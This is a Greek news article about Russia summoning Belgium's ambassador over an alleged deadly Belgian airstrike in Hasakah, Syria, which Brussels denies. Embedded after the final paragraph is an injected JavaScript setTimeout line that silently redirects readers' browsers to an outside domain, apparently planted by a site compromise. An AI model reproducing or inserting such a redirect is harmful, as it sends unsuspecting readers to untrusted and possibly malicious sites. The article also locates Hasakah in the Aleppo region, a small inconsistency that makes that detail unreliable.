Ένταση στις σχέσεις Ρωσίας-Βελγίου: Στο ρωσικό ΥΠΕΞ εκλήθη ο Βέλγος πρέσβης

0
16

 

Η κατάσταση στη Συρία είναι η αιτία για την ένταση στις σχέσεις Ρωσίας-Βελγίου, καθώς η Μόσχα διαμαρτύρεται στις Βρυξέλλες για τους φονικούς βελγικούς βοβαρδισμούς στην πόλη Χάσακε ενώ οι Βρυξέλλες ζητούν από τη Μόσχα να αποσύρει τις «αβάσιμες» κατηγορίες της.

Το ρωσικό ΥΠΕΞ κάλεσε τον Βέλγο πρέσβη στη Μόσχα να προσέλθει κι εκεί ενημερώθηκε για την «αμηχανία» της Μόσχας «μπροστά στην επίμονη άρνηση του Βελγίου να παραδεχθεί» την εμπλοκή της Πολεμικής Αεροπορίας του σε μια επίθεση στην περιοχή του Χαλεπιού στις 18 Οκτωβρίου, σύμφωνα με ανακοίνωση του υπουργείου.

Η επίθεση αυτή στη Χάσακε κατέστρεψε δύο σπίτια και προκάλεσε τον θάνατο έξι ανθρώπων και τον τραυματισμό τεσσάρων ακόμη μεταξύ των αμάχων.

Οι Βρυξέλλες διαψεύδουν ότι διεξήγαγαν αυτή την επίθεση και δηλώνουν ότι στον χάρτη που παρουσιάζεται από τη Μόσχα ως απόδειξη, και ο οποίος φέρεται να περιλαμβάνει το σχέδιο πτήσης των βελγικών αεροσκαφών, δεν εμφανίζεται κανένας από τους αριθμούς αναγνώρισης των αεροσκαφών της βελγικής Πολεμικής Αεροπορίας.

Ο Ρώσος πρεσβευτής στο Βέλγιο Αλεξάντερ Τοκόβιν εκλήθη χθες στο βελγικό υπουργείο Εξωτερικών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here